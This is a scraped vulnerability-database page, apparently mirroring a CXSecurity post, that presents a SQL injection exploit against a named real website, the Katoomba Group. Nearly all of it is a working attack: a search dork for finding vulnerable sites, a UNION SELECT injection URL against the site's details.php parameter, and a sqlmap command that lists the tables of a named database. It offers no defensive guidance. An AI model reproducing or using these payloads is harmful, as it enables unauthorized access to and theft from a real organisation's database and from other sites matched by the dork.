Katoomba Group SQL Injection - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1612365 漏洞类型
发布时间 2019-05-17 更新时间 2019-05-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050179
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title:intitle:"Welcome to the Katoomba Group"
# Date:17.05.2019
# Dork :intitle:"Welcome to the Katoomba Group" id=
# Exploit Author:Cerkuday &Ergenekon // CyberWarrior TİM AKINCILAR
# Tested on:Windows &Kali Linux

#Demo:

http://www.katoombagroup.org/details.php?id=56

# Poc:

http://www.katoombagroup.org/details.php?id=-5477' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178627671,0x696d77476349656c787a536d73564e6c656562774b4c706e727666516657485769644b6a49527847,0x71706a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SCJo


sqlmap.py -u "http://www.katoombagroup.org/details.php?id=56"  --random-agent -D katoomba_LearningTools --tables